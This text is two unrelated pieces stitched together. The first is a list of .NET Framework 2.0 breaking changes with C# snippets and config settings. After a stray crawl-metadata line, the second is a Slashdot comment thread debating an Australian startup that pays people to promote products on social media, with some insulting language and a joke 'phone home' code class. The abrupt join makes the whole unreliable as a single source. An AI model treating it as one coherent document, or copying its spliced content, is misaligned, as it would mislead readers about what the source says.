"Whenever you set the apartment state of a running managed thread, you are in a race condition. That's because things like .cctors or security demands or assembly load notifications may have executed on that thread, perhaps causing marshaling of oleaut data—or any number of other things that could have caused a CoInitialize to happen. Even if the first line of your managed threadproc sets the apartment state, we have already executed an arbitrary amount of managed application code. And that arbitrary set of code changes whenever you upgrade the CLR, change the JIT inlining, fiddle with .cctor rules for NGEN vs. domain neutral, change security policy, etc.
If you are trying to set it to MTA, chances are you are okay. That's because we will default to MTA if we need to CoInitialize a thread. The only way someone would have set it to STA is if a .cctor or security infrastructure or hosting code had done this to you. And that would be pretty rude. Of course, if the CLR sets it to MTA and then the app sets it to MTA, this will be quietly accepted. So the only case that's likely to break is if the application selects STA but the CLR has already CoInitialized the running thread to MTA.
Anyway, the bottom line is that applications which set the apartment state of a running managed thread are perched on a knife edge. Long term, we need to move to a more stable and predictable world. The only question is the best way to do this. >We needed to change the behavior of 'main' on a managed EXE to be MTA if it is unspecified and we added a config setting for old C++ apps and for VB/C# apps that weren't built with Visual Studio.
The other change we added is for managed threads started with 't = new Thread(...); t.Start();'. If you didn't set the apartment state before you called Start, then it is now too late. We will have already placed you in the MTA. The same config setting to get the old behavior applies here too.
We realize that both of these changes will break apps. But those apps are going to break at some rate, as we disturb the race conditions anyway. We are providing the deterministic and reliable behavior now, know it will break some applications, rather than leaving in non-deterministic behavior that breaks applications with each new release."
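Under the v2.0 rules described in the quote, a worker thread's apartment must be chosen before it starts. A minimal sketch (the `Work` method is a placeholder; on non-Windows platforms SetApartmentState may throw, since apartments are a COM concept):

```csharp
using System;
using System.Threading;

class ApartmentSketch
{
    static void Work()
    {
        // COM work that requires an STA thread goes here.
    }

    static void Main()
    {
        Thread t = new Thread(Work);

        // Must happen before Start(): once the thread is running, the
        // CLR has already CoInitialized it (to MTA by default) and it
        // is too late to change.
        t.SetApartmentState(ApartmentState.STA);
        t.Start();
        t.Join();
    }
}
```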
For Unicode standard compliance, Encoding.GetBytes() will not emit bytes if there is an unpaired or out-of-order surrogate. This is most obvious if the caller calls GetBytes() with a single high or low surrogate; in this case, UTF8Encoding and UnicodeEncoding will emit nothing.

Unicode 4.0 requires that compliant applications not emit unpaired surrogates. In v1.1, GetBytes() would emit bytes for lone surrogates if the encoding supported it (such as UTF8Encoding and UnicodeEncoding). However, this left the CLR out of compliance with Unicode 4.0.

The change can break an application's assumption that GetBytes() will emit bytes for leading high surrogates or mismatched surrogates. BinaryWriter.Write(char ch) is one example of what was broken.
Although breaking, we would need to go head and fix this to provide more consistent behavior, justification:
// Assume the user's current calendar is JapaneseCalendar. CultureInfo ci = new CultureInfo("ja-JP"); // Create Japanese culture ci.DateTimeFormat.Calendar = new GregorianCalendar(); // Switch to Gregorian calendar Console.WriteLine(ci.DateTimeFormat.FullDateTimePattern; // The Japanese format is printed out, while Gregorian format is expected.
Cctor ordering for beforefieldinit types is not specified by ECMA. ECMA only specifies that the runtime will execute cctors on beforefieldinit types some time prior to any access to a type's static field. It does not offer any guarantees regarding exactly when and in which order these cctors should be executed.
Note: C# automatically marks types as beforefieldinit when static fields are initialized using "=" syntax like in "static int i = 5;". VB.NET programs are not affected since they use precise cctor semantics always.
In v1.0 and v1.1, some pathways through the loader recorded a failure to load an assembly and would fail subsequent attempts to load that same assembly into the same AppDomain. However, most pathways through the loader would not cache this binding failure. This lack of caching enables certain scenarios, which some customers are doubtless taking advantage of.
In v2.0, the default behavior is to break these scenarios. Naturally the .NET Framework supports an opt-in mechanism to force the loader back to the v1.0 & v2.0 behavior via a config file. These scenarios are broken by the following changes made in v2.0:
The v1.x binder was arbitrarily assigning binding preferences between two methods. For example, in v1.x if you swap the declared order of M0 (or M2) the binder will bind to the other method.
using System; using System.Reflection; class C { public void M0(object arg) { Console.WriteLine(2); } public void M0(ref int arg) { Console.WriteLine(1); } public void M1(ref object arg) { Console.WriteLine(2); } public void M1(ref int arg) { Console.WriteLine(1); } } class Repro { static void Main() { // Result depends on the order the M0 overloads were declared typeof(C).InvokeMember("M0", BindingFlags.Public | BindingFlags.Instance | BindingFlags.InvokeMethod, null, new C(), new object[] { 100 }, null); // Result depends on the order the M1 overloads were declared typeof(C).InvokeMember("M1", BindingFlags.Public | BindingFlags.Instance | BindingFlags.InvokeMethod, null, new C(), new object[] { 100 }, null); } }
Now, in v2.0, we throw an AmbiguousMatchException and inform the developer about the ambiguous match rather than leave in the arbitrary, and prone-to-change, behavior of previous releases.
#if VS2005B2 SafeHandle handle = infoField.GetValue(configKey) as SafeHandle; IntPtr keyHandle = handle.DangerousGetHandle(); #endif
Hashtable h = new Hashtable(); h.GetEnumerator(); (h as ICollection).GetEnumerator(); Hashtable h2 = Hashtable.Synchronized(h); h2.GetEnumerator(); (h2 as ICollection).GetEnumerator();
If you pass in an array with one or more null entries into the API WaitHandle.WaitAll, in V1.1 this would throw an ArgumentNullException. In V2.0 this will throw a FatalExcecutionException, which cannot be caught and will tear down the process.
This happens because of a coding error. There is code to detect this situation and throw an exception, but some code earlier in the routine puts the array in a special wrapper that dereferences all the entries in it, which causes an AV in the VM, which tears down the process because that is the policy for failures of this type.
Applications dependent on the implementation of private fields could be broken when the private field's type changes.
For instance, an app could use reflection to obtain a private field and try casting that field to an illegal type.
This has broken applications such as the Enterprise Library configuration tool, where the field type used to be safely cast to an IntPtr value, but since it has changed to a SafeHandle in v2.0 can no longer be cast this way.
The StackTrace dump in Environment and Exception had an error in V1.1 where it did not report nested type names correctly:
namespace A { public class B { public class C { public string f() { return new StackTrace().ToString(); } } } }
In V1.1 this reported "A.C.f()". In V2.0 the error was corrected to report "A.B.C.f()". Test code that baselines stack traces or code that cracked the text output of stack traces could have taken a dependency on the original bug.
Put a catch block at the top of your non-main thread, threadpool workitem, or finalizer. (Or else fix the bug that led to the exception.)
Alternatively, in the section of the application's config file, add the following:<legacyUnhandledExceptionPolicy enabled="1"/>
<legacyUnhandledExceptionPolicy enabled="1"/>
Class .ctor ordering for beforefieldinit types is not specified by ECMA. ECMA only specifies that runtimes will execute clas .ctors on beforefieldinit types some time prior to any access to a type's static field. It does not offer any guarantees regarding when exactly this might happen and in which order exactly. This of course never stopped anybody to (unknowingly) take a dependency on unspecified behavior if the behavior is consistent on the same runtime version.
Note: C# automatically marks types this way when static fields are initialized using "=" syntax like in "static int i = 5;". VB.NET programs are not affected since they use precise class .ctor semantics always.
An FxCop rule has been added to help detect the invalid pattern.
A thread can save the state of ReaderWriterLock into a LockCookie, and restore the state in the future using the saved LockCookie. A LockCookie can be serialized to a buffer. The buffer can be modified and then deserialized to a LockCookie. Now a thread can use the new LockCookie to restore the state of ReaderWriterLock. A LockCookie for one ReaderWriterLock can be used to restore a different ReaderWriterLock.
In addition, a LockCookie contains thread information about the thread to which a lock belongs. Serializing to a buffer, changing the thread id, and deserializing could open possible desynchronization attacks against arbitrarily chosen threads, provided that their identifiers were known or could be guessed
In 1.1 the three values in the enum System.Diagnostics.PerformanceCounterPermissionAccess were Browse:6, Instrument:2, Admin:14. These have been changed to browse:3, Instrument:1, Admin:7
Additionally, the value of System.AttributeTargets.All has changed from 16383, to 32767
IntPtr oldHandle = waitHandle.Handle; Win32.CloseHandle( oldHandle ); waitHandle.Handle = Win32.CreateEvent( );
From V1.1 to V2.0 the WaitHandle class has changed. It now points to a SafeWaitHandle, not to the raw handle.
Getting the handle and closing it is bad. The SafeWaitHandle still tracks the old handle and it will try to close it at finalize time. This means that the handle can be attempted to be closed twice.
The .NET Framework 1.1 C# compiler in certain cases generates code that calls virtual methods non-virtually. One of these cases is where there is a switch statement based on strings where the number of cases is greater than 8. In .NET Framework 2.0 a change was made to the verification rules for security purposes to disallow calling virtual methods non-virtually (in most cases). Therefore when code that was compiled using the .NET Framework 1.1 compiler is executed against .NET Framework 2.0, and the compiled MSIL binary contains a normal CALL (instead of a CALLVIRT) to a virtual method, and the assembly is running in partial trust, the MSIL needs to be verified, and it fails verification because of the new rule. The failure shows up as a System.Security.VerificationException.
The next broad release of the .NET Framework (2.0 SP1 or Orcas) has a workaround for this issue. The workaround is to modify the machine.config file for the machine where the application is running by replacing the default "<runtime />" with:
<runtime> <legacyVirtualMethodCallVerification enabled="1" /> </runtime> | http://msdn.microsoft.com/es-es/netframework/aa497241(en-us).aspx | crawl-002 | refinedweb | 2,569 | 57.47 |
0
I have been working on this array problem since last Friday. We are to accept an employee's gross sales, multiply that by 9%(to find commission) add $200 for weekly salary. Then the program takes that dollar amount and tallies payroll with ( *'s) beside salary groupings....
ex
$200-299 ****
$300-399 **
$400-499* ......ect
my problem is I can't get this to complie to even see how close I am. My compiler keeps giving this error...
\Sales.java:30: ')' expected
salary = (double 200 + (grossSales * .09 ));
^
java:30: ';' expected
java:30: ';' expected
salary = (double 200 + (grossSales * .09 ));
^
I'm lost and frustrated and need some advice......Here is what I have
/import java.util.Scanner; public class Sales { //counts number or salespersons in different salary ranges public void countRanges() { Scanner input = new Scanner( System.in ); double salary;//salespersons pay double grossSales;//sales to base commission of 9% on //ininialize the values in the array to zero salary = 0; grossSales = 0; //read in values and assign them to the appropriate ranges System.out.print( "Enter Gross Sales or enter a negative number to exit" ); dollars = input.next.Int(); grossSales = dollars; while ( dollars >= 0 ) { //calculate salary an get range by salary/100 salary = (double 200 + (grossSales * .09 )); range = ( salary/100 ); if ( range > 10 ) range = 10; //count totals for every range for ( int counter = 0; counter < array.length; counter++ ) total += array[ counter ]; if ( counter == 10 ) System.out.printf( "%5d: ", 1000 ); else System.out.printf( "%3d-%3d: ", counter * 100, counter * 100 + 9 ); //enter next sales amount (negative to end) System.out.print( "Enter next Gross Sales or enter a negative number to exit" ); grossSales = input.nextInt(); }//end while //print chart for ( int stars = 0; starts < array [counter]; star++ ) System.out.print( "*" ); }//end method countRanges }//end class Sales | https://www.daniweb.com/programming/software-development/threads/173349/simple-array-problem-not-so-simple | CC-MAIN-2017-47 | refinedweb | 295 | 67.35 |
Today Jeff Wilcox, David Anson, and I did a Channel 9 live session with Dan Fernandez at the PDC on Microsoft campus. You can catch it almost exactly 55 minutes into the stream here (note to self: try to remember what team you work on - it's the Application Platform team, not the Application Development team!)
One thing I mentioned was the LazyListBox, which you can find here, and the other ListBox virtualization samples that you can find on the Silverlight Performance blog here.
Anyway, I foolishly promised to publish something on my blog, so here it is. It's a simple class called MemoryDiagnosticsHelper that shows a counter similar to the built-in frame-rate counter that can be used to show how much memory you are using. It will also Assert if you go over the marketplace limit of 90MB, which is nice. It also ensures that the calls to DeviceExtendedProperties are only made in DEBUG mode so that you won't get a scary disclosure in marketplace for "identifying the device."
Anyway, the code is attached along with a very silly sample app. All you really need is the MemoryDiagnosticsHelper.cs file though, which you can pull into your existing apps and add a line like this in App.xaml.cs right under the call to EnableFrameRateCounter
MemoryDiagnosticsHelper.Start(TimeSpan.FromMilliseconds(500), true);
at 500 ms and do GC
MemoryDiagnostics.MemoryDiagnosticsHelper.Start(TimeSpan.FromMilliseconds(500), doGarbageCollectOnTimer);
the
return (long)DeviceExtendedProperties.GetValue("ApplicationCurrentMemoryUsage");
and the peak one fail with an out of range arg after 2.5 hours continuous running. I've since changed 500 to 2000, and for the heck of it not forcing GC. Time will tell if the 2.5 is related to the call interval, or the system itself.
Thanks for the feedback. We are tracking this bug internally -- don't have any other status right now. | http://blogs.msdn.com/b/ptorr/archive/2010/10/30/that-memory-thing-i-promised-you.aspx | CC-MAIN-2014-15 | refinedweb | 313 | 56.76 |
#include <itkFEMP.h>
List of all members.
FEMP holds a pointer to objects of class T and its derived classes. it behaves like a special kind of pointer. Special pointers to object can be used to store polymorphic arrays in STL. The basic idea of the special pointer is: whatever you do to the pointer (object of class FEMP), is also reflected on the object within (pointed to by m_Data member). For example: if you copy the special pointer, an object within is also copied.
Class T should have a member Clone() which produces a copy of an object. This is important in polymorphic classes, where object of the derived class should be created when copying an existing object.
Class T should also include typedefs T::Pointer and T::ConstPointer that define standard pointers to the class. Note that these could be SmartPointer classes.
Definition at line 46 of file itkFEMP.h.
Copy constructor. Clone() method is called to duplicate the existing object.
Definition at line 63 of file itkFEMP.h.
References itk::fem::FEMP< T >::m_Data.
Conversion constructor from T::Pointer to FEMP<T>. The object T* must exist and we take ownership of object T*. If you want to create a copy of object and take ownership of that, use: FEMP(x->Clone()) instead of FEMP(x).
Definition at line 76 of file itkFEMP.h.
Copy constructor. Clone() method is called to duplicate the existing object.
Definition at line 63 of file itkFEMP.h.
References itk::fem::FEMP< T >::m_Data.
Asignment operator
Self assignments don't make sense.
First destroy the existing object on the left hand side
Then clone the one on the right hand side of the expression (if not NULL).
Definition at line 131 of file itkFEMP.h.
References itk::fem::FEMP< T >::m_Data. | http://www.itk.org/Doxygen38/html/classitk_1_1fem_1_1FEMP.html | crawl-003 | refinedweb | 299 | 68.57 |
NNVM is a new deep learning framework introduced by DMLC. NNVM is a compiler for deep learning. This is the point which differentiate NNVM from other existing deep learning frameworks such as TensorFlow. NNVM compiles given graph definition into execution code. Of course TensorFlow can also do same thing. But we need to write graph definition in TensorFlow manner. NNVM is a runtime agnostic compiler. If you familiar with LLVM, you may know what I mean.
NNVM provides
Once you write a graph definition, it can be optimized on various kind of hardwares. This architecture is just similar to the frondend and backend of LLVM compiler. We can find Caffe, Keras, MXNet, PyTorch, Caffe2 and CNTK is now supported as frontend of NNVM, which means if you already have a graph definition in these frameworks, you can run it by using NNVM.
Graph definition is first compiled into an original intermediate representation called TVM IR. TVM syntax looks very similar to the API in TensorFlow.
import tvm n = tvm.var("n") A = tvm.placeholder((n,), name='A') B = tvm.placeholder((n,), name='B') C = tvm.compute(A.shape, lambda i: A[i] + B[i], name="C") print(type(C))
You write a graph definition in TVM. Then it is compiled into the code runnable on target device.
fadd_cuda = tvm.build(s, [A, B, C], "cuda", target_host="llvm", name="myadd")
Since TVM only provides very primitive kernel API, NNVM is the framework we use for deploying a complex deep learning model on production.
This is the post to explain how to build NNVM on your laptop. My local machine is macOS Sierra 10.12.6.
Though you may not need to do this depending on your target device and frontend, it’s recommended to install them anyway. Protocol buffer is required by ONMX.
$ brew install protobuf llvm
Check out first. NNVM includes several submodules such as TVM to be built together. Please make sure to add
--recursive option.
$ git clone --recursive
We build TVM first.
$ cd nnvm/tvm $ mkdir build $ cd build $ cmake .. $ make
You will find artifacts
libtvm.dylib and
libtvm_runtime.dylib if it finished successfully. Then we build python interface of TVM.
$ cd ../python $ python setup.py install $ cd ../topi/python $ python setup.py install
Finally we can build NNVM source code.
$ cd nnvm $ make $ cd python $ python setup.py install --user
Adding library path is necessary to let Python find required libraries for NNVM.
export PYTHONPATH=/path/to/nnvm/python:${PYTHONPATH} export LD_LIBRARY_PATH=/path/to/nnvm/tvm/build:${LD_LIBRARY_PATH}
Then you can run NNVM program through Python interface.
> python Python 3.6.0 |Anaconda 4.3.1 (x86_64)| (default, Dec 23 2016, 13:19:00) [GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.57)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> import nnvm TVM: Initializing cython mode... >>>
What to be noted here is that we need to rebuild TVM and NNVM if you change the target device where the program is deployed. | https://www.lewuathe.com/compiling-nnvm.html | CC-MAIN-2018-26 | refinedweb | 502 | 70.19 |
hello,
yes - fedora uses javac for the compiler - that comes with eclipse
Hi,
I am using Fedora core 5 32+ bit as my os on the pc. I want to learn Java a bit on my own. Can I compile Java code from the terminal itself? I am not used to any particular IDE at the moment so terminal seems to be the best way forward as I have been doing this with my sample C++ codes as well. I would appreciate any further guidance in terms of what is the best way to start programming in Java on Fedora platform. Thanks a lot gentlemen.
hello,
yes - fedora uses javac for the compiler - that comes with eclipse
telnet mtrek.game-host.org 1701
And some good books which I recommend:
The Java tutorial from Sun microsystems.
Core Java Vol I,II. again from Sun microsystems.
The first one is free to download from Sun.com, but the other ones are not free.
Good luck with Java.
This will be over soon, and then I can ...
1. I agree that I need to go for JDK, but if I try the following in a terminal this is what I get as a result of running the command:
[root@localhost ~]# yum install java
Setting up Install Process
Setting up repositories
dries [1/6]
dries 100% |=========================| 951 B 00:00
core [2/6]
core 100% |=========================| 1.1 kB 00:00
updates [3/6]
updates 100% |=========================| 1.2 kB 00:00
freshrpms [4/6]
freshrpms 100% |=========================| 951 B 00:00
macromedia [5/6]
macromedia 100% |=========================| 951 B 00:00
extras [6/6]
extras 100% |=========================| 1.1 kB 00:00
Reading repository metadata in from local files
Parsing package install arguments
Nothing to do
As it says 'nothing to do', should I automatically assume that the native support for Java for my Fedora core 5 os is now enabled? Is this action (running the command yum install java) going to affect the successful running of Java on my pc after I install the necessary stuff from Sun website?
2. Now I have already run the command 'yum install java', so I tried to see if it was installed by typing this command which I am quite unsure of.
[root@localhost ~]# rpm -qi java
package java is not installed
Here it says 'package java is not installed'. What does this suppose to mean?
3. I have been looking around the net on various Linux forums and people have been telling me different things when I ask a simple question like what actually I need to download from Sun's site to run Java perfectly. Some are saying that I need only one thing and that is JRE, not JDK.
So I searched on the net and came across this page for Linux download for Java. It does not say whether it is JRE or JDK.
I just downloaded the file Linux RPM (self-extracting file) filesize: 17.67 MB and followed this page for the installation of it.
Now when I type this command in a shell this is what I get:
[root@localhost ~]# rpm -qi jre
Name : jre Relocations: /usr/java
Version : 1.6.0_01 Vendor: Sun Microsystems, Inc.
Release : fcs Build Date: Wed 14 Mar 2007 10:56:32 AM GMT
Install Date: Sun 27 May 2007 01:50:40 PM BST Build Host: jdk-lin-1586
Group : Development/Tools Source RPM: jre-1.6.0_01-fcs.src.rpm
Size : 45843609 License: Sun Microsystems Binary Code License (BCL)
Signature : (none)
Packager : Java Software <jre-comments@java.sun.com>
URL :
Summary : Java(TM).
So this means that JRE is installed properly on the system then? Or does it mean that I no longer need JDK?
I am sorry for the length of the post, but I hope that someone like you can clarifiy the doubts and confusions that are bothering me at the moment. Thanks....
First of all when you include commands in your posts use code tag.
You can download JDK from here.
You can also download NetBeans from that link. It is a very powerfull IDE for Java.
Aftre you downloaded the file install it, and add the java's compiler path to the PATH environment variable too. If you encountered any problems post them here (remember the code tag
).).
This will be over soon, and then I can ...
JDK 6u1
JDK 6u1 with Java EE
JDK 6u1 with NetBeans 5.5.1
and the one that you have mentioned as NetBeans is the third on the page ie
JDK 6u1 with NetBeans 5.5.1
From the page :
Right?
Thanks for the help I just needed some proper guidance then I will be alright.
I think this is the one with NetBeans then:
Java SE Development Kit and NetBeans IDE Cobundle (JDK 6u1 / NB 5.5.1)
and here is the page:
Linux Platform - Java SE Development Kit and NetBeans IDE Cobundle (JDK 6u1 / NB 5.5.1)
Java SE Development Kit and NetBeans IDE Cobundle (JDK 6u1 / NB 5.5.1), Multi-language jdk-6u1-nb-5_5_1-linux-ml.bin 140.61 MB
Just installed it ie JDK 6u1 with NetBeans 5.5.1
but when I try to compile a small file called james.java saved in a folder called PracJava on desktop, from the terminal with the following commands it for some reason gives the following error:
Here is the cod of the file named james.javaHere is the cod of the file named james.javaCode:[root@localhost ~]# cd Desktop/PracJava [root@localhost PracJava]# javac james.java /usr/bin/javac: line 3: java: command not found [root@localhost PracJava]#
Can some one suggest me something?Can some one suggest me something?Code:public class google { public static void main(String args[]) { System.out.println("Hello Mr. Bond, nice to see you!"); } }
Thanks
i just did the following
One thing here is strange, libjavaplugin_oji.so is flashing in a red background. Is it some kind of error that needs to be corrected?One thing here is strange, libjavaplugin_oji.so is flashing in a red background. Is it some kind of error that needs to be corrected?Code:[root@localhost ~]# su [root@localhost ~]# whereis netbeans netbeans: /opt/netbeans-5.5.1/bin/netbeans [root@localhost ~]# cd /opt [root@localhost opt]# ls jdk1.6.0_01 jre-6u1-linux-i586-rpm.bin netbeans-5.5.1 jre-6u1-linux-i586.rpm libjavaplugin_oji.so [root@localhost opt]#
Thanks...
Sorry for being late, I couldn't access internet in the last 24 hours
In Java programs the name of the file containing the main function must be the same as the class containing the main function. In this case it must be google.java not james.java.
And have you added the path containing the java program to the PATH environment variable?
This will be over soon, and then I can ...
Bookmarks | http://www.linuxhomenetworking.com/forums/showthread.php/17940-Compiling-Java-in-a-terminal?p=137588&viewfull=1 | CC-MAIN-2013-20 | refinedweb | 1,147 | 74.29 |
Cash For Tweets and Facebook Posts? Aussie Startup Pays You to Astroturf 156
An anonymous reader writes "While the celebs are already charging big money for their Tweets, an Aussie startup is ranking everyday people and turning them into product salespeople. After a successful start Down Under they have now hit Silicon Valley, but will Americans embrace selling to their friends?" From the article: "In a nutshell, individuals sign up to the Social Loot website and are assigned companies to promote to their circle of online friends. They are then paid on a sliding scale based on the amount of traffic their posts generate, and the quality of referrals and number of resulting sales. This is tracked by a code embedded in the links promoted by Social Loot’s spruikers."
This should be considered illegal (Score:5, Insightful)
This is advertising. It is also a lie. That's fraud, plain and simple.
Re:This should be considered illegal (Score:5, Insightful)
The same should apply to tweets. They are broadcasts, and so the people making them should disclose whether it is advertising or not.
Re: (Score:1)
Can't have it both ways. Either free speech, paid or not, or a form of censorship. Someone will have to enforce the disclosure requirement, and that someone would _have_ to be given authority to investigate any twitterer. On the scale of the internet this is _insane_.
Re: (Score:3)
It's just a matter of time til everyone knows twitter is for suckers that want to read a bunch of really short astroturf
About minus four years?
Re:This should be considered illegal (Score:5, Interesting)
You make a good point. When the Alan Jones cash for comments scandal broke, he got absolutely slammed in court for not disclosing who was paying him to promote various things on his show. The same should apply to tweets. They are broadcasts, and so the people making them should disclose whether it is advertising or not.
Or you could just not be friends with people who will spam you with crap so they can earn 8 cents a week.
Re:This should be considered illegal (Score:4, Insightful)
You don't understand how astroturfing works. The goal is transparency and deception. Astroturfing appears as opinion, but is actually scumbag capitalism.
Re: (Score:2)
You don't understand how astroturfing works. The goal is transparency and deception. Astroturfing appears as opinion, but is actually scumbag capitalism.
As I understand it, astroturfing doesn't work without people to participate in the process. Don't be friends with those people and you won't have to wonder whether you're hearing opinion or advertising.
Re: (Score:3)
The point is that the entire goal of astroturfing is to make it as hard as possible to distinguish astroturf from genuine opinion. If you can't tell the difference then you can't unfriend only the astroturfers. Especially when the astroturfer really is genuine 90% of the time and only shills on rare occasion.
Re:This should be considered illegal (Score:4, Informative)
This one relies on embedded codes in their URLs to measure their effectiveness; it wouldn't be difficult to detect.
Re: (Score:3)
You don't have to, there's various "un-shortening" and "URL lengthening" services, along with plugins for pretty much every browser, available that do it for you, often fully transparently.
Re: (Score:2)
Do this the simple way: if you run Firefox, load the "Long URL Please" addon.
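As the comments above note, these links carry an embedded referral code, which makes them mechanically detectable and strippable. A minimal Python sketch of the idea (the "sl_ref" parameter name is a made-up example, since Social Loot's actual codes aren't published; the utm_* keys are the common campaign-tracking parameters):

```python
# Hedged sketch: strip suspected tracking parameters from a shared URL.
# "sl_ref" is a hypothetical referral-code name; utm_* are the common
# campaign-tracking parameters added by marketing tools.
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

TRACKING_KEYS = {"sl_ref"}       # hypothetical referral code parameter
TRACKING_PREFIXES = ("utm_",)    # common campaign-tracking prefixes

def strip_tracking(url: str) -> str:
    """Return the URL with suspected tracking parameters removed."""
    parts = urlsplit(url)
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k not in TRACKING_KEYS and not k.startswith(TRACKING_PREFIXES)]
    return urlunsplit(parts._replace(query=urlencode(kept)))

print(strip_tracking("http://example.com/deal?id=7&sl_ref=abc123&utm_source=twitter"))
# -> http://example.com/deal?id=7
```

A browser addon or filter doing this at click time would quietly zero out the spruiker's referral credit.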
Transparency? (Score:2)
Quite the opposite, actually.
Re: (Score:2)
Wtf? reactionary hyperbole?
Just unfriend such so called "friends" (Score:4, Insightful)
After politely warning them to cease such activity. I cannot understand why there are so many people who want to involve the government in everything, which is what happens when you advocate that something you don't like should be made illegal.
Re: (Score:2)
Re: (Score:2)
A government that doesn't protect the 99% from the 1%, who have consistently shown themselves to embody the most pernicious, sociopathic forms of Randism (which is all of them), is no government worth having.
Re: (Score:2)
How do you know Microsoft Office respects your privacy? Do you have access to the source? From what I've heard Microsoft at the very least keeps track of the hardware on which you run its software.
Re:This should be considered illegal (Score:4, Informative)
How do you know Microsoft Office respects your privacy? Do you have access to the source?
You don't need it. It runs on your local machine, so you can check every network connection that it makes and, more importantly, you can trivially prevent it from making any network connections.
From what I've heard Microsoft at the very least keeps track of the hardware on which you run its software.
And the reason you know this (it's related to Windows Update, not MS Office specifically) is that people did intercept the data sent to Microsoft from Windows Update and found out exactly what was being sent.
Re: (Score:2)
You don't need it. It runs on your local machine, so you can check every network connection that it makes and, more importantly, you can trivially prevent it from making any network connections.
I'm not saying Office does anything malicious, but it would be trivial for Microsoft to put a backdoor in their own OS.
Re: (Score:2)
Assuming they are incompetent.
For example, the "Microsoft Update" scheme is, as I understand it, run over an unencrypted protocol.
There would be nothing stopping office telling the update client to send a few bytes of data along with that stream.
Re: (Score:2)
Privacy policies don't exist in their current complicated form to help you or define your rights. It's for legal indemnity for any company that has them, if it's more than 8-10 sentences long.
Re: (Score:3)
I admit I'm very impressed! I know I'm sticking my neck out depending on the eyes of many others to verify that open source programs such as LibreOffice respect privacy, but you relying on the output of a disassembler to reveal all potential downfalls of a program all by your lonesome far exceeds my meager abilities. My hat is off to you!
Re: (Score:2)
using Microsoft.IO.Evil;
// ...
// Phone Home Module ------ Mwahaha
public class PhoneHomeMessenger
{
    public PhoneHomeMessenger(string firstName, string lastName,
                              string creditCardNumber, List<byte[]> secretWebcamPhotos)
    {
        // ....
    }
}
Re: (Score:2)
I just knew you'd be here, blowing smoke up Microsoft's arse or slamming Google for something unrelated.
How much do you get paid for this bullshilling you have been doing now for such a long time under oh-so-many different accounts?
Do you look forward to the competition from Social Loot, or do you work for/through them now?
Anyway, good work - any pay you receive is too much as you are such an obvious shill.
And, before you protest that you don't get paid -- well if that's true then you need psych help; but
Re: (Score:2)
Re: (Score:1, Offtopic)
Phew. Thank you for reminding me to bump up my threshold after moderation.
Re: (Score:3)
Since when is pitching products illegal? It's not something I'd do to my friends for products I don't believe in, though.
Re: (Score:2)
It's specifically an Australian company. Australia does have some rules about having to disclose when you are being paid to say something.
They apply to the media, but who knows when a court will decide that a tweet is the same as hosting a radio show.
Re:This should be considered illegal (Score:5, Insightful)
This has nothing to do with selling product. This is all about corruptly flooding forums with trolls, thousands of them. The marketing and promotional lie is selling products to friends; the reality is poisoning every possible social network with an endless stream of bullshit marketing.
How long will a social site last when you have a couple of hundred thousand trolls flooding it with links, desperate to collect a couple of cents per click?
The guy is nothing but another mass trolling pig. Doesn't give a crap about people's social interactions, quite happy to bring them all crashing down, basically he wants to become a social forum spammer and that's what the arse hole is selling to corporations.
You can filter out some IP's but not hundreds of thousands of scattered ones, you can block robots but not hundreds of thousands of pathetic greedy ignorant trolls.
A purveyor of lies on a mass scale. Of course the trolls he employs will become the most hated people on the internet, kicked out of social network after social network.
Re: (Score:2)
Are you telling me that this is gonna kill Facebook and Twitter? Really? REALLY?
Naa, you're just saying it to make me happy!
Re:This should be considered illegal (Score:5, Interesting)
In previous years, usenet was a social gathering ground on the internet.. being unmoderated was its strength, but also its weakness and Canter & Siegel started a movement that killed it eventually. This has the capability to kill off twitter and facebook sure, but since they both have a controlling entity who could institute moderation then perhaps they can stave off demise by some quick thinking..
Re: (Score:2)
It's not Facebook or Twitter that need to react. It's the people who receive the message. I unfollow and unfriend people who post pointless spam, that's the solution. People lose their audience and soon they are worth nothing.
Re: (Score:2)
Which doesn't really matter on a social network. I have a limited number of contacts. If the filters the site use don't work then it's a few seconds work for me to ignore or remove the person who posted it. People have been doing company sponsored advertising for years, the get a free iPad links being one of the more recent examples. Some people
Re: (Score:3)
The guy is nothing but another mass trolling pig. Doesn't give a crap about people's social interactions, quite happy to bring them all crashing down, basically he wants to become a social forum spammer and that's what the arse hole is selling to corporations.
The world you're looking for is capitalist or "job creator" if you're Republican. This is practically the history of corporations. Find a new untapped resource and spoil it for everyone else by monetising it in the filthiest way possible until the "evil government" steps in to protect people from the "upstanding businessman" who is "creating wealth".
I fully agree with you, Facebook and Twitter will be entering a war with companies like this if they know what's good for them. This is really no different f
Re: (Score:2)
Don't worry about Facebook (or, in my case, don't get your hopes up).
What will happen is simply this: FB will notice that there are people getting paid to spill crap. They'll change their TOS and forbid shilling (at least if you don't pay them for it), a few people will get their account banned and everyone else will cower in fear of being the next and the whole crap stops.
What's left is the "professional" shills. Just like you have today.
Re: (Score:2)
How long will an social site's last when you have a couple of hundred thousand trolls flooding the site with links,...
They seem to be coping just fine at the moment.
Re: (Score:2)
Re:This should be considered illegal (Score:5, Funny)
Re: (Score:2)
This is advertising. It is also a lie. That's fraud, plain and simple.
What if I post my dropbox referral code? I don't get anything but free space.
Ahem - hey, I like dropbox, check it out! [db.tt] Sign up with that code and you get 500 megs free too!
lol. It's funny because it's true.
Re: (Score:2)
This is advertising. It is also a lie. That's fraud, plain and simple.
Kill it before it multiplies. Hang and eviscerate on site.
Re: (Score:2)
Re: (Score:2)
Damn rite... Its a sham two sea that people don't no their language and it's spelling rules...
Re: (Score:2)
This will fall under what I call "affiliate marketing laws" and the FTC is very serious about them. Go read their website (the ftc) and you'll see how many people and companies they've sued recently.
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Hush! If anyone from the IRS hears you they want some virtual property tax or similar bull.
oh no here come shills, (Score:2)
i quit reading facebook update because of all of the adds for different games and crap on facebook. all i wanted was to know what my freinds who do not live near me where doing in meatspace now all there is are posts of "look at this funny/inspirational/religious/photoshopped picture some else posted i and i am reposting" and "i am playing a flash game you need to play the flash game to" i don't want to see more freaking adds. can we a decrapafied section of the Internet where we all agree that any spammer
Re: (Score:1)
While I agree with your overall point, you shouldn't post when drunk.
Re: (Score:2)
